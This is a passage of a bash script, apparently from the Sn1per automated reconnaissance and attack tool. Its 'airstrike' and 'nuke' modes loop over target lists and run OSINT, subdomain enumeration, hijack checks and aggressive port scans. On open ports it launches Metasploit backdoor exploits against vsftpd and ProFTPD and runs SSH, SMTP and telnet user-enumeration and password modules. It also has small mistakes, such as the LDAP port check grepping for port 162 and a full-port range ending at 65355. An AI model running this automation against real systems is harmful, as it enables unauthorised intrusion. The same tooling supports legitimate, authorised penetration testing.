 537 |   echo -e ""
 538 |   rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
 539 |   exit
 540 | fi
 541 | 
 542 | if [ "$MODE" = "airstrike" ]; then
 543 |   if [ "$OPT1" = "report" ]; then
 544 |     sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
 545 |     exit
 546 |   fi
 547 |   echo -e "$OKRED                ____               $RESET"
 548 |   echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
 549 |   echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
 550 |   echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
 551 |   echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 552 |   echo -e "$OKRED               /_/                 $RESET"
 553 |   echo -e "$RESET"
 554 |   echo -e "$OKORANGE + -- --=[http://crowdshield.com"
 555 |   echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
 556 |   
 557 |   for a in `cat $TARGET`;
 558 |   do
 559 |     echo -e "$OKRED                                         |"
 560 |     echo -e "$OKRED                  |                      |"
 561 |     echo -e "$OKRED                  |                    -/_\-"
 562 |     echo -e "$OKRED                -/_\-   ______________(/ . \)______________"
 563 |     echo -e "$OKRED   ____________(/ . \)_____________    \___/     <>"
 564 |     echo -e "$OKRED   <>           \___/      <>    <>"
 565 |     echo -e "$OKRED "
 566 |     echo -e "$OKRED      ||"
 567 |     echo -e "$OKRED      <>"
 568 |     echo -e "$OKRED                            ||"
 569 |     echo -e "$OKRED                            <>"
 570 |     echo -e "$OKRED                                       ||"
 571 |     echo -e "$OKRED                                       ||            BIG"
 572 |     echo -e "$OKRED        _____               __         <>      (^)))^ BOOM!"
 573 |     echo -e "$OKRED  BOOM!/((  )\       BOOM!((  )))            (     ( )"
 574 |     echo -e "$OKRED ---- (__()__))          (() ) ))           (  (  (   )"
 575 |     echo -e "$OKRED     ||  |||____|------    \  (/   ___     (__\     /__)"
 576 |     echo -e "$OKRED      |__|||  |     |---|---|||___|   |___-----|||||"
 577 |     echo -e "$OKRED  |  ||.  |   |       |     |||                |||||"
 578 |     echo -e "$OKRED      |__|||  |     |---|---|||___|   |___-----|||||"
 579 |     echo -e "$OKRED  |  ||.  |   |       |     |||                |||||"
 580 |     echo -e "$OKRED __________________________________________________________"
 581 |     echo -e "$OKRED Bomb raid (contributed by Michael aka SNOOPY@DRYCAS.CLUB.CC.CMU.EDU)"
 582 |     echo -e "$RESET"
 583 |     echo -e "$OKORANGE + -- --=[Launching airstrike: $a $RESET"
 584 |     echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
 585 |     nslookup $a
 586 |     host $a
 587 |     
 588 |     if [[ ${a:0:1} =~ $REGEX ]];
 589 |     then
 590 |       SCAN_TYPE="IP"
 591 |     else
 592 |       SCAN_TYPE="DOMAIN"
 593 |     fi
 594 |     
 595 |     if [ $SCAN_TYPE == "DOMAIN" ];
 596 |     then
 597 |       echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET"
 598 |       whois $a
 599 |       echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET"
 600 |       theharvester -d $a -l 100 -b bing 2> /dev/null
 601 |       echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
 602 |       dig -x $a
 603 |       dnsenum $a
 604 |       mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
 605 |       echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
 606 |       python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $a -vvv -o $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
 607 |       dos2unix $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
 608 |       echo ""
 609 |       echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
 610 |       echo -e "$OKRED ║  ╠╦╝ ║ ╚═╗╠═╣$RESET"
 611 |       echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
 612 |       echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
 613 |       echo -e "$OKBLUE"
 614 |       curl -s https://crt.sh/?q=%25.$a > /tmp/curl.out && cat /tmp/curl.out | grep $a | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$a-crt.txt && cat $LOOT_DIR/domains/domains-$a-crt.txt
 615 |       echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$a-full.txt"
 616 |       cat $LOOT_DIR/domains/domains-$a-crt.txt > /tmp/curl.out 2> /dev/null
 617 |       cat $LOOT_DIR/domains/domains-$a.txt >> /tmp/curl.out 2> /dev/null
 618 |       sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$a-full.txt
 619 |       rm -f /tmp/curl.out 2> /dev/null
 620 |       echo -e "$RESET"
 621 |       echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
 622 |       for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus' 2>/dev/null; done;
 623 |       echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
 624 |       python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null
 625 |     fi
 626 |     echo ""
 627 |     echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET"
 628 |     nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $a -oX $LOOT_DIR/nmap/nmap-$a.xml
 629 |     
 630 |     port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
 631 |     port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
 632 |     
 633 |     if [ -z "$port_80" ];
 634 |     then
 635 |       echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
 636 |     else
 637 |       echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
 638 |       echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
 639 |       wafw00f http://$a
 640 |       echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
 641 |       whatweb http://$a
 642 |       echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
 643 |       xsstracer $a 80
 644 |       echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
 645 |       if [ ${DISTRO} == "blackarch"  ]; then
 646 |         /bin/CutyCapt --url=http://$a --out=$LOOT_DIR/screenshots/$a-port80.jpg
 647 |       else
 648 |         cutycapt --url=http://$a --out=$LOOT_DIR/screenshots/$a-port80.jpg
 649 |       fi
 650 |     fi
 651 |     
 652 |     if [ -z "$port_443" ];
 653 |     then
 654 |       echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
 655 |     else
 656 |       echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
 657 |       echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
 658 |       wafw00f https://$a
 659 |       echo -e "$OKGREEN + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +$RESET"
 660 |       cd $PLUGINS_DIR/CloudFail/
 661 |       python3 cloudfail.py --target $TARGET
 662 |       cd $INSTALL_DIR
 663 |       echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
 664 |       whatweb https://$a
 665 |       echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
 666 |       xsstracer $a 443
 667 |       echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
 668 |       sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $a
 669 |       sslscan --no-failed $a
 670 |       echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
 671 |       if [ ${DISTRO} == "blackarch"  ]; then
 672 |         /bin/CutyCapt --url=https://$a --out=$LOOT_DIR/screenshots/$a-port443.jpg
 673 |       else
 674 |         cutycapt --url=https://$a --out=$LOOT_DIR/screenshots/$a-port443.jpg
 675 |       fi
 676 |       echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$a-port443.jpg"
 677 |     fi
 678 |     
 679 |     echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET"
 680 |     echo -e ""
 681 |     echo -e ""
 682 |     echo -e ""
 683 |     echo -e ""
 684 |     echo -e ""
 685 |     echo -e ""
 686 |     echo -e ""
 687 |     echo -e ""
 688 |     echo -e ""
 689 |     echo -e ""
 690 |     echo -e ""
 691 |     echo -e ""
 692 |     echo -e ""
 693 |     echo -e ""
 694 |     echo -e ""
 695 |   done;
 696 |   exit
 697 | fi
 698 | 
 699 | if [ "$MODE" = "fullportonly" ]; then
 700 |   echo -e "$OKRED    ___     ____              __            __    $RESET"
 701 |   echo -e "$OKRED   / _/_ __/ / /__  ___  ____/ /____  ___  / /_ __$RESET"
 702 |   echo -e "$OKRED  / _/ // / / / _ \/ _ \/ __/ __/ _ \/ _ \/ / // /$RESET"
 703 |   echo -e "$OKRED /_/ \_,_/_/_/ .__/\___/_/  \__/\___/_//_/_/\_, / $RESET"
 704 |   echo -e "$OKRED            /_/                            /___/  $RESET"
 705 |   echo -e "$RESET"
 706 |   echo -e "$OKGREEN + -- ----------------------------=[Performing Port Scan]=------------------- -- +$RESET"
 707 |   if [ -z "$OPT1" ]; then
 708 |     nmap -T4 -sV -O -v -p 1-65355 -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 709 |     echo -e "$OKGREEN + -- ----------------------------=[Enumerating Exploits]=------------------- -- +$RESET"
 710 |     searchsploit -v --nmap $LOOT_DIR/nmap/nmap-$TARGET.xml
 711 |   else
 712 |     nmap -T4 -sV -O -v -p $OPT1 -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 713 |     echo -e "$OKGREEN + -- ----------------------------=[Enumerating Exploits]=------------------- -- +$RESET"
 714 |     searchsploit -v --nmap $LOOT_DIR/nmap/nmap-$TARGET.xml
 715 |   fi
 716 |   echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
 717 |   exit
 718 | fi
 719 | 
 720 | if [ "$MODE" = "port" ]; then
 721 |   if [ -z "$OPT1" ]; then
 722 |     echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
 723 |     exit
 724 |   fi
 725 | fi
 726 | 
 727 | if [ "$MODE" = "nuke" ]; then
 728 |   if [ "$OPT1" = "report" ]; then
 729 |     sniper $(realpath $TARGET) $MODE | tee $LOOT_DIR/sniper-$(basename $TARGET)-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
 730 |     exit
 731 |   fi
 732 |   for a in `cat $(realpath $TARGET)`; do
 733 |     echo -e "$OKRED "
 734 |     echo -e "$OKRED                              ____"
 735 |     echo -e "$OKRED                      __,-~~/~    \`---."
 736 |     echo -e "$OKRED                    _/_,---(      ,    )"
 737 |     echo -e "$OKRED                __ /        <    /   )  \___"
 738 |     echo -e "$OKRED - ------===;;;'====------------------===;;;===----- -  -"
 739 |     echo -e "$OKRED                   \/  ~'~'~'~'~'~\~'~)~'/"
 740 |     echo -e "$OKRED                   (_ (   \  (     >    \)"
 741 |     echo -e "$OKRED                    \_( _ <         >_>'"
 742 |     echo -e "$OKRED                       ~ \`-i' ::>|--\""
 743 |     echo -e "$OKRED                           I;|.|.|"
 744 |     echo -e "$OKRED                          <|i::|i|\`."
 745 |     echo -e "$OKRED                        (\` ^''\`-' ')"
 746 |     echo -e "$OKRED --------------------------------------------------------- $RESET"
 747 |     echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET"
 748 |     sniper $a
 749 |     echo -e ""
 750 |     echo -e ""
 751 |     echo -e ""
 752 |     echo -e ""
 753 |     echo -e ""
 754 |     echo -e ""
 755 |     echo -e ""
 756 |     echo -e ""
 757 |     echo -e ""
 758 |     echo -e ""
 759 |     echo -e ""
 760 |     echo -e ""
 761 |     echo -e ""
 762 |     echo -e ""
 763 |     echo -e ""
 764 |   done
 765 |   exit
 766 | fi
 767 | 
 768 | echo -e "$OKRED                ____               $RESET"
 769 | echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
 770 | echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
 771 | echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
 772 | echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 773 | echo -e "$OKRED               /_/                 $RESET"
 774 | echo -e "$RESET"
 775 | echo -e "$OKORANGE + -- --=[http://crowdshield.com"
 776 | echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
 777 | echo -e "$RESET"
 778 | echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
 779 | nslookup $TARGET
 780 | host $TARGET
 781 | echo -e "$OKGREEN + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +$RESET"
 782 | xprobe2 $TARGET
 783 | if [ $SCAN_TYPE == "DOMAIN" ];
 784 | then
 785 |   echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET"
 786 |   whois $TARGET
 787 |   echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET"
 788 |   theharvester -d $TARGET -l 100 -b bing 2> /dev/null
 789 |   echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
 790 |   dig -x $TARGET
 791 |   dnsenum $TARGET
 792 |   mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
 793 |   echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
 794 |   python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
 795 |   dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
 796 |   echo ""
 797 |   echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
 798 |   echo -e "$OKRED ║  ╠╦╝ ║ ╚═╗╠═╣$RESET"
 799 |   echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
 800 |   echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
 801 |   echo -e "$OKBLUE"
 802 |   curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
 803 |   echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
 804 |   cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
 805 |   cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
 806 |   sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
 807 |   rm -f /tmp/curl.out 2> /dev/null
 808 |   echo -e "$RESET"
 809 |   echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
 810 |   for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus' 2>/dev/null; done;
 811 |   echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
 812 |   python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
 813 | fi
 814 | echo ""
 815 | echo -e "$OKGREEN + -- ----------------------------=[Pinging host]=---------------------------- -- +$RESET"
 816 | ping -c 1 $TARGET
 817 | echo ""
 818 | echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
 819 | if [ -z "$OPT1" ]; then
 820 |   nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 821 | elif [ "$OPT1" == "web" ]; then
 822 |   nmap -sV -T5 -Pn -p 80,443  --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 823 | else
 824 |   nmap -sS -T5 -Pn -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 825 |   echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
 826 |   nmap -sU -T5 -Pn -p U:$OPT1 --open $TARGET
 827 | fi
 828 | 
 829 | if [ -z $DISABLE_POSTGRESQL ]; then 
 830 |   service postgresql start
 831 | fi
 832 | 
 833 | echo ""
 834 | echo -e "$OKGREEN + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +$RESET"
 835 | port_21=`grep 'portid="21"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 836 | port_22=`grep 'portid="22"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 837 | port_23=`grep 'portid="23"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 838 | port_25=`grep 'portid="25"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 839 | port_53=`grep 'portid="53"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 840 | port_79=`grep 'portid="79"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 841 | port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 842 | port_110=`grep 'portid="110"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 843 | port_111=`grep 'portid="111"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 844 | port_135=`grep 'portid="135"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 845 | port_139=`grep 'portid="139"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 846 | port_161=`grep 'portid="161"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 847 | port_162=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 848 | port_389=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 849 | port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 850 | port_445=`grep 'portid="445"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 851 | port_512=`grep 'portid="512"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 852 | port_513=`grep 'portid="513"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 853 | port_514=`grep 'portid="514"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 854 | port_623=`grep 'portid="623"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 855 | port_624=`grep 'portid="624"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 856 | port_1099=`grep 'portid="1099"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 857 | port_1433=`grep 'portid="1433"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 858 | port_1524=`grep 'portid="1524"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 859 | port_2049=`grep 'portid="2049"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 860 | port_2121=`grep 'portid="2121"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 861 | port_3128=`grep 'portid="3128"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 862 | port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 863 | port_3310=`grep 'portid="3310"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 864 | port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 865 | port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 866 | port_4443=`grep 'portid="4443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 867 | port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 868 | port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 869 | port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 870 | port_5984=`grep 'portid="5984"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 871 | port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 872 | port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 873 | port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 874 | port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 875 | port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 876 | port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 877 | port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 878 | port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 879 | port_16992=`grep 'portid="16992"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 880 | port_27017=`grep 'portid="27017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 881 | port_27018=`grep 'portid="27018"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 882 | port_27019=`grep 'portid="27019"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 883 | port_28017=`grep 'portid="28017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 884 | port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 885 | 
 886 | if [ -z "$port_21" ];
 887 | then
 888 |   echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET"
 889 | else
 890 |   echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"
 891 |   nmap -A -sV -Pn -sC -T5 -p 21 --script=ftp-* $TARGET
 892 |   msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
 893 | fi
 894 | 
 895 | if [ -z "$port_22" ];
 896 | then
 897 |   echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET"
 898 | else
 899 |   echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET"
 900 |   if [ $DISTRO == "blackarch" ]; then
 901 |     /bin/ssh-audit $TARGET:22
 902 |   else
 903 |     cd $PLUGINS_DIR/ssh-audit
 904 |     python ssh-audit.py $TARGET:22
 905 |   fi
 906 |   cd $INSTALL_DIR
 907 |   nmap -A -sV -Pn -sC -T5 -p 22 --script=ssh-* $TARGET
 908 |   msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
 909 | fi
 910 | 
 911 | if [ -z "$port_23" ];
 912 | then
 913 |   echo -e "$OKRED + -- --=[Port 23 closed... skipping.$RESET"
 914 | else
 915 |   echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET"
 916 |   echo ""
 917 |   cisco-torch -A $TARGET
 918 |   nmap -A -sV -Pn -T5 --script=telnet* -p 23 $TARGET
 919 |   msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
 920 | fi
 921 | 
 922 | if [ -z "$port_25" ];
 923 | then
 924 |   echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET"
 925 | else
 926 |   echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET"
 927 |   nmap -A -sV -Pn -T5 --script=smtp* -p 25 $TARGET
 928 |   smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
 929 |   msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;"
 930 | fi
 931 | 
 932 | if [ -z "$port_53" ];
 933 | then
 934 |   echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
 935 | else
 936 |   echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
 937 |   nmap -A -sU -sV -Pn -T5 --script=dns* -p U:53,T:53 $TARGET
 938 | fi
 939 | 
 940 | if [ -z "$port_79" ];
 941 | then
 942 |   echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET"
 943 | else
 944 |   echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
 945 |   nmap -A -sV -Pn -T5 --script=finger* -p 79 $TARGET
 946 |   bin/fingertool.sh $TARGET $USER_FILE
 947 | fi
 948 | 
 949 | if [ -z "$port_80" ];
 950 | then
 951 |   echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
 952 | else
 953 |   echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
 954 |   echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
 955 |   wafw00f http://$TARGET
 956 |   echo ""
 957 |   echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
 958 |   whatweb http://$TARGET
 959 |   xsstracer $TARGET 80
 960 |   echo ""
 961 |   echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET"
 962 |   echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
 963 |   curl -s --insecure -I http://$TARGET | egrep -i 'X-Content' | tail -n 10
 964 |   echo ""
 965 |   echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE"
 966 |   curl -s --insecure -I http://$TARGET | egrep -i 'X-Frame' | tail -n 10
 967 |   echo ""
 968 |   echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE"
 969 |   curl -s --insecure -I http://$TARGET | egrep -i 'X-XSS' | tail -n 10
 970 |   echo ""
 971 |   echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE"
 972 |   curl -s --insecure -I -X OPTIONS http://$TARGET | grep Allow | tail -n 10
 973 |   echo ""
 974 |   echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
 975 |   curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10
 976 |   echo ""
 977 |   echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
 978 |   curl -s --insecure http://$TARGET | egrep -i meta --color=auto | tail -n 10
 979 |   echo ""
 980 |   echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
 981 |   curl -s --insecure -x http://$TARGET:80 -L http://google.com | tail -n 10
 982 |   echo ""
 983 |   echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE"
 984 |   curl -s --insecure -I http://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10
 985 |   echo ""
 986 |   echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE"
 987 |   curl -s --insecure -I http://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10
 988 |   echo ""
 989 |   echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE"
 990 |   curl -s --insecure http://$TARGET/crossdomain.xml | tail -n 10
 991 |   echo ""
 992 |   echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE"
 993 |   curl -s --insecure http://$TARGET/clientaccesspolicy.xml | tail -n 10
 994 |   echo ""
 995 |   echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE"
